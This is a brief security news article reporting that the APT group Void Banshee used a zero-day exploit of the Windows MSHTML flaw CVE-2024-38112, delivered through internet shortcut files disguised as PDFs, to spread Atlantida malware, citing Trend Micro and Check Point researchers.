July 16, 2024 By Zeljka Zorz
The zero-day exploit used to leverage CVE-2024-38112, a recently patched Windows MSHTML vulnerability, was wielded by an APT group dubbed Void Banshee to deliver malware to targets in North America, Europe, and Southeast Asia, threat hunters with Trend Micro’s Zero Day Initiative have shared.
How Void Banshee used CVE-2024-38112
As previously explained by Check Point researcher Haifei Li, the attackers used files that were specially crafted to exploit the vulnerability but were made to look like PDFs.
“The threat actor leveraged CVE-2024-38112 to execute malicious code by abusing the MHTML protocol handler and x-usc directives through internet shortcut (URL) files. Using this technique, the threat actor was able to access and run files directly through the disabled Internet Explorer instance on Windows machines,” Trend Micro researchers noted.
“This MHTML code execution vulnerability was used to infect users and organizations with Atlantida malware.”
The attack chain (Source: Trend Micro)
